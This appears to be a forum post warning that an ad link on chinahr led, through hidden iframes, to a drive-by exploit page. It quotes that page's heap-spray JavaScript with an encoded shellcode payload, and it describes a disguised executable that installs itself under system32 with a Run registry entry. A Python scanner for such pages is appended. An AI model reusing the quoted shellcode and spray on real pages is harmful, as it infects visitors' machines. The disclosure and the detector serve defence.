Visiting chinahr triggers a virus
Clicking a link takes you in
It first goes to:
http://track.chinahr.com/metrics/AdClick.aspx?AdID=742
This is an Apache error page. The odd thing is that it ends in .aspx, which taken literally should mean .NET, unless something special is being done.
I went there with Firefox and nothing much happened.
The main thing is that it has this code embedded:
<iframe src="http://impotato.com/adv/34DRES74E/ads_r.html" width="1" height="1" style="visibility:hidden;"></iframe>
Then I opened this page:
http://impotato.com/adv/34DRES74E/ads_r.html
First, it should be exploiting a Windows vulnerability:
<SCRIPT language="javascript">
e = unescape("%u9090%u9090%u9090%u9090%ue1d9%u34d9%u5b24%u5b5b%u805b%uf4eb%u338d%uf789%uef81%ufd3d%uffff%u01eb%u8001%u0c7b%u7501%u313b%u8ac9%u490f%uc985%u1774%u3147%u31d2%u66c0%u078b%ufc80%u75ff%u3002%u88e4%u0654%u47f4%ue247%u8dec%u8133%ub2ee%uffff%u89ff%u31f7%u66c9%u75b9%u3102%ub2d2%uacdc%ud030%uaa42%uf9e2%u5489%u5c3b%ua90c%u3d6b%ub30f%u9593%u8484%u8585%u89c2%u8382%ub23c%uafc8%u819a%u929d%u978a%u979f%u98d2%u9a86%u69cc%u7776%u3f74%u2829%u6461%u647a%u6c78%u607a%u723e%u7e7d%u743b%u6172%u2a37%u5f2e%u584e%u284d%u6414%u4f0d%u400a%u425e%u40e4%u534f%u415c%u5d41%u1155%u5658%u5940%u195f%u565b%uf757%uf40d%u71b6%uc922%u310c%ucbcc%u47dc%u4948%uc5c2%u4de1%u4f4e%ud036%u7e91%uaa56%ude85%ua51d%uacd3%udc3a%u0699%u3162%ued0a%u6b2a%u988a%ue0bf%u9337%u13ec%u6e62%u4505%u2dff%u262c%u2289%uf080%u8f3f%u152c%u6548%uf1af%u547d%u4cb5%uc10b%u04fb%ue8dc%udcdd%udfdc%u6ec1%u6c41%u69e1%u0ffe%u1366%u6494%u104b%ufcc8%u6891%uf1f3%u765b%uac4e%ua9a8%udeaa%uc8df%u9cdc%u9f82%udfd6%ub5d8%ue249%u3040%u4bff%uc843%ud742%u0b94%u526d%u123b%u87ac%uc9a0%ucbda%ua5cc%ucc26%ud1d0%ud3b8%u062b%u925f%u5434%u735c%udddd%ubfde%u9c6b%u6a0e%u5c22%ue40e%ue9e8%u4f19%u2b8d%ue3a8%u49f2%ufeff%uf8f9%u7731%ufa10%ufbfa%u6d6c%u6f6e%u81c7%uffee%u0504%u9796%u9998%u8bcd%u0efc%u0f0e%u8180%u8382%u95d2%u14e2%u1918%u9072%uf141%u8797%u22d5%u2322%ua5e3%u24df%u2928%u2be9%u2d2c%uafa3%u32d8%u3332%ue5cb%ud6ef%u0de1%u601e%u6667%ubf65%ub5ab%uc224%u3c87%ub846%uc09b%u2d95%u8acd%u4f62%u39ff%u1ddc%ub95a%u80a9%u52b0%u5b5a%u285c%u3a2d%u5212%u4d50%u09ff%u670a%uba97%uade3%u053a%u1483%u0bb6%ua48d%uf2f9%u771f%u7978%u7b10%u7d16%u7f14%u7ed0%u0651%uf144%ud1a2%uf7e0%u55a6%u7203%u0259%uf817%u9392%uc594%u4469%uf1ce%u8c9b%uf496%u4861%u262d%ua3cb%ua5a4%u58f6%u427b%u546b%u51d9%u40c6%u517e%u4cd2%u8463%ue776%u6a47%uee79%u8cea%ud56c%u99e0%u48a6%ud584%u0743%uc5b0%u8b41%u46c0%ud3be%u5a7d%udbba%ud93f%u975d%ue8ec%u6a13%u5664%ud7f2%u3317%u0b6b%ub8ba%ub725%ubcba%ubcbc%ua967%ufbca%ua57b%uefd6%ub17d%uebd2%uad71%uefde%u9177%uebda%u448b%u883e%uff50%u067e%u82e2%u1340%u5787%u0e2e
%uf2fb%u5a20%u219f%u169d%u28f6%ue7e5%udd2d%u27b2%u55c0%ue225%u28eb%ue027%udbc3%u5711%u3508%uce5b%u6bbb%u3216%u53df%u3bbd%ub273%u2760%ud63d%u23b5%u40cb%ua8a9%u7446%u189d%u1416%u1310%u89cf%u8c46%u0550%u0181%u01ce%u01e2%u0283");
ss = 20 + e.length;
bb = unescape( "%u0D0D" );
while ( bb.length < ss ) bb += bb;
fb = bb.substring( 0, ss );
b = bb.substring( 0, bb.length - ss );
while ( b.length + ss < 0x40000 ) b = b + b + fb;
memory = new Array();
for ( i=0; i<400; i++ ) memory[ i ] = b + e;
</SCRIPT>
This does the memory overflow part.
Then another page is hidden here:
<IFRAME width=1 height=1 SRC=http://www.impotato.com%20id=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 NAME="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??"></IFRAME>
This page downloads and runs a program.
The program is called
AdService.dll
but it is actually an .exe file.
When it runs, an icon resembling the SP2 security patch appears in the taskbar.
The file is placed under %winnt%\system32\ as AdService.dll
At the same time
it writes a registry startup entry:
Software\Microsoft\Windows\CurrentVersion\Run\
The address linked inside the program is:
http://www.slimshield.com/landing.htm?wm=acc167&soft=sshield
It's confirmed that chinahr has a problem; everyone should stay away for now.
My mail: yhx001@gmail.com
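As an added example (not from the original post), a small Python scanner that flags the two tell-tales described above in a saved copy of a page: 1x1 or hidden iframes, and a script that unescapes a %u-encoded blob and sprays it into an array. The HTML sample is constructed, modelled on the quoted snippets, with example.invalid standing in for the real hosts.

```python
import re

# Constructed sample page, modelled on the snippets quoted in the post.
SAMPLE_HTML = """
<html><body>
<iframe src="http://example.invalid/adv/ads_r.html" width="1" height="1" style="visibility:hidden;"></iframe>
<SCRIPT language="javascript">
e = unescape("%u9090%u9090%u9090%u9090%ue1d9%u34d9");
bb = unescape( "%u0D0D" );
while ( bb.length < ss ) bb += bb;
memory = new Array();
for ( i=0; i<400; i++ ) memory[ i ] = b + e;
</SCRIPT>
<iframe src="http://example.invalid/ok.html" width="300" height="250"></iframe>
</body></html>
"""

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
# name=value pairs; handles double-quoted, single-quoted and bare values (as in the post's second iframe)
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
UNESCAPE_RE = re.compile(r"""unescape\s*\(\s*['"]((?:%u[0-9a-f]{4})+)['"]\s*\)""", re.I)
ARRAY_FILL_RE = re.compile(r"for\s*\(.*?\)\s*\w+\s*\[", re.S)


def parse_attrs(tag):
    """Lower-cased attribute dict for one HTML tag."""
    return {m.group(1).lower(): (m.group(2) or m.group(3) or m.group(4) or "")
            for m in ATTR_RE.finditer(tag)}


def hidden_iframes(html):
    """Return src values of iframes that are 0/1 pixel in size or styled invisible."""
    found = []
    for tag in IFRAME_RE.findall(html):
        a = parse_attrs(tag)
        tiny = a.get("width", "") in ("0", "1") and a.get("height", "") in ("0", "1")
        style = a.get("style", "").replace(" ", "").lower()
        if tiny or "visibility:hidden" in style or "display:none" in style:
            found.append(a.get("src", ""))
    return found


def heap_spray_scripts(html):
    """One record per <script> that both decodes a %u blob and fills an array in a loop."""
    hits = []
    for body in SCRIPT_RE.findall(html):
        blobs = UNESCAPE_RE.findall(body)
        if blobs and re.search(r"new\s+Array", body) and ARRAY_FILL_RE.search(body):
            longest = max(blobs, key=len)
            hits.append({"blob_words": len(longest) // 6,            # each %uXXXX is one 16-bit word
                         "starts_with_nop_sled": longest.lower().startswith("%u9090")})
    return hits
```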